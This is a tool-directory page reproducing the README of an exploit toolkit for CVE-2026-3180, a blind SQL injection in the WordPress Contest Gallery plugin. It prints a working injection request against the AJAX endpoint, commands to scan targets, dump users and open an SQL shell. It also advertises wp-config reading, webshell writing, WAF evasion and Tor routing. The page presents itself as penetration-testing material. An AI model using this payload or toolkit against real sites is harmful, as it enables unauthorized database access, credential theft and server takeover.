Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
WP-Contest-Gallery-28.1.4-Exploit — Complete exploitation toolkit for CVE-2026-3180 - WordPress Contest Gallery SQL Injection vulnerability. Features automated data extraction, WAF bypass, reverse shell, SQLMap integration, Burp extension generation, and reporting for penetration testing and security research. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/wp-contest-gallery-28.1.4-exploit
Password CrackingVulnerability ScannersExploitationWeb Application ExploitationWAF BypassPenetration TestingPayload Development
GitHub

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
cerberusmrxi/wp-contest-gallery-28.1.4-exploit

WP-Contest-Gallery-28.1.4-Exploit

Complete exploitation toolkit for CVE-2026-3180 - WordPress Contest Gallery SQL Injection vulnerability. Features automated data extraction, WAF bypass, reverse shell, SQLMap integration, Burp extension generation, and reporting for penetration testing and security research.

View Repository
11192 months agoNot yet reviewed
⚠️ Under Testing
This PoC is actively being tested and refined. Features may change between releases.

CVE-2026-3180

WordPress Contest Gallery — Unauthenticated Blind SQL Injection

Python Version CVSS License Platform

Proof-of-concept assessment tool for CVE-2026-3180
Author: Sudeepa Wanigarathna · Original discovery: cardosource


[!IMPORTANT] Authorized use only. This tool is for security research, education, and testing systems you own or have explicit written permission to assess. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.


Table of Contents

  • Overview
  • Vulnerability Details
  • Features
  • Installation
  • Quick Start
  • Usage Guide
  • Command Reference
  • Injection Techniques
  • WAF Bypass
  • Data Extraction
  • Integrations
  • Attack Chain
  • Output & Reports
  • Docker
  • CI/CD Integration
  • Troubleshooting
  • Repository Layout
  • Version History
  • Disclaimer
  • Author & Credits

Overview

CVE-2026-3180 is a high-severity, unauthenticated blind SQL injection in the WordPress Contest Gallery plugin. The flaw exists in the post_cg1l_resend_unconfirmed_mail_frontend AJAX handler, where the cgl_mail parameter is passed to a SQL query without proper sanitization.

This repository provides a full-featured Python PoC (v2.0) for authorized security professionals to validate impact, extract WordPress data, generate reports, and integrate with industry-standard tooling (SQLMap, Burp Suite, Nuclei).

wp

Vulnerability Details

AttributeValue
CVE IDCVE-2026-3180
CVSS7.5 (High)
Attack VectorNetwork — unauthenticated
ImpactConfidentiality breach, database read, credential theft
Affected ProductWordPress Contest Gallery plugin
Affected Versions28.1.4 and earlier
Vulnerability TypeBlind SQL Injection
DBMSMySQL / MariaDB

Affected Endpoint

FieldValue
URL/wp-admin/admin-ajax.php
MethodPOST
Actionpost_cg1l_resend_unconfirmed_mail_frontend
Vulnerable Parametercgl_mail

Proof-of-Concept Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.example
Content-Type: application/x-www-form-urlencoded

action=post_cg1l_resend_unconfirmed_mail_frontend
&cgl_mail=qualquer'OR/**/1=1#@teste.com
&cgl_page_id=1
&cgl_activation_key=
&cg_nonce=%20

References

  • CVE-2026-3180
  • Exploit-DB 52609
  • Original write-up (cardosource)

Features

Core Exploitation

CapabilityDescription
Vulnerability detectionBoolean, time-based, error-based, union, and stacked query tests
Blind extractionBinary-search character extraction via boolean inference
Full data dumpUsers, database metadata, options, plugins, themes, posts, tables
Interactive SQL shellRun arbitrary SELECT queries against the backend
wp-config.php extractionLOAD_FILE() attempts against common paths
Reverse shellPHP webshell write via INTO OUTFILE / DUMPFILE (when permitted)

Evasion & Performance

CapabilityDescription
WAF bypass15+ encoding and obfuscation techniques
Multi-threadingConfigurable worker threads for faster extraction
Rate limitingConfigurable delay between requests
Retry logicAutomatic retries on transient failures
User-Agent rotationRandom browser fingerprints per request
Proxy supportHTTP/SOCKS proxies and Tor (socks5h://127.0.0.1:9050)

Reporting & Integrations

CapabilityDescription
Report generationJSON and HTML reports with extraction summaries
SQLMap integrationAuto-generated SQLMap command with tampers
Burp Suite extensionGenerator + standalone burp_contest_gallery.py
Nuclei templateYAML template for mass detection
Metasploit moduleRuby auxiliary module (contest_gallery_sqli.rb)
Shell automationBash scripts for curl-based and SQLMap workflows

Operational

CapabilityDescription
Colored CLI outputStructured logging with severity levels
Progress trackingReal-time metrics (requests, timing, extraction speed)
Quiet / verbose modesSuitable for scripting and debugging
Signal handlingGraceful cleanup on Ctrl+C
Docker readyContainerized deployment support
CI/CD pipeline readyExit codes and JSON output for automation

Installation

Prerequisites

  • Python 3.8+
  • pip
  • Network reachability to target(s) under test

Optional External Tools

ToolPurpose
SQLMapAutomated SQL injection
Burp SuiteManual testing & extension hosting
NucleiTemplate-based scanning
HashcatOffline hash cracking
TorAnonymous routing (--proxy tor)

Setup

git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2026-3180.py --help

Dependencies

Required (runtime):

requests>=2.31.0

Recommended (from requirements.txt):

colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0

The main exploit uses only the Python standard library plus requests. Additional packages enhance output and reporting.


Quick Start

Replace http://target.example with a lab or authorized target only.

Check vulnerability

python3 cve-2026-3180.py http://target.example --scan

Full exploitation (detect + extract)

python3 cve-2026-3180.py http://target.example

Dump WordPress users

python3 cve-2026-3180.py http://target.example --dump users

Interactive SQL shell

python3 cve-2026-3180.py http://target.example --sql-shell

Generate HTML report

python3 cve-2026-3180.py http://target.example --report html -o assessment.html

Through Burp proxy

python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v

Usage Guide

Vulnerability scan only

python3 cve-2026-3180.py http://target.example --scan

Runs boolean, time-based, and error-based detection without full extraction.

Download Tool